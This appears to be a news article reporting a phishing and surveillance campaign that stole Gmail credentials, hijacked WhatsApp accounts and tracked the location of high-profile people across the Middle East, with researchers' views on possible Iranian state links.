**Hacking Campaign Targets High-Profile Gmail and WhatsApp Users Across Middle East**
As Iran grapples with the longest nationwide internet shutdown in its history, a sophisticated hacking campaign has been targeting high-profile individuals across the Middle East, including Gmail and WhatsApp users.
Nariman Gharib, a U.K.-based Iranian activist who monitors digital activity related to Iranian protests, tweeted about his own experience with the phishing campaign. He shared screenshots of a suspicious link sent via WhatsApp message, warning others not to click on similar links. TechCrunch obtained the full phishing link and analyzed its source code, along with input from security researchers.
Our analysis suggests that the campaign aimed to steal Gmail and other online credentials, compromise WhatsApp accounts, and conduct surveillance by stealing location data, photos, and audio recordings. However, it remains unclear whether the hackers are government-linked agents, spies, or cybercriminals – or a combination of all three.
**Phishing Campaign's M.O.**
The phishing site used a dynamic DNS provider called DuckDNS to mask its real location. TechCrunch discovered that the attackers used DuckDNS to create a subdomain (duckdns.org) that connected to a server hosting the phishing page at alex-fabow.online.
Once the victim clicked on the suspicious link, they were redirected to a fake Gmail login page or asked for their phone number. The source code of the phishing page revealed a flaw: by modifying its URL in the browser, TechCrunch was able to view a file containing over 850 records of information submitted by victims during the attack flow.
These records included copies of usernames and passwords entered on the phishing page, as well as incorrect entries and two-factor codes. The exposed file showed that the campaign targeted Windows, macOS, iPhone, and Android users, and in one case, revealed a victim's entry attempts until they entered their correct password and two-factor authentication code.
**Surveillance and Hijacking**
Beyond credential theft, the campaign also enabled surveillance by tricking victims into sharing their location, audio, and pictures from their device. In Gharib's case, tapping on the link opened a fake WhatsApp-themed page displaying a QR code, which would instantly link the victim's WhatsApp account to a device controlled by the attacker.
Security researcher Runa Sandvik examined the phishing page code and found that it triggered browser notifications asking for permission to access location data (via navigator.geolocation) and photos/audio. If accepted, the browser sent the person's coordinates to the attacker and continued sharing their location every few seconds while the page remained open.
**Attribution and Motivation**
It is unclear who is behind this campaign. While we don't know the identities of all victims, some are a Middle Eastern academic working in national security studies; the boss of an Israeli drone maker; a senior Lebanese cabinet minister; at least one journalist; and individuals with U.S. phone numbers.
A government-backed group might want to steal email passwords and two-factor codes of high-value targets like politicians or journalists, allowing them to download private information. The timing and targeting of this campaign could point to an espionage effort aimed at collecting information about specific individuals.
**Expert Insights**
Security researcher Gary Miller examined the phishing code and exposed data from the attacker's server. He noted that the attack "certainly [had] the hallmarks of an IRGC-linked spearphishing campaign," referring to highly targeted email hacks carried out by Iran's Islamic Revolutionary Guard Corps.
Miller pointed to international targeting, credential theft, and social engineering techniques used in the phishing link. In contrast, a financially motivated hacker might use stolen credentials for malicious purposes like stealing proprietary business information or cryptocurrency.
**Lessons Learned**
The case highlights the importance of caution when interacting with unsolicited links, especially those from popular messaging platforms like WhatsApp. As Miller notes, "Clicking on unsolicited WhatsApp links is a high-risk, unsafe practice." To securely contact this reporter, use Signal via the username: zackwhittaker.1337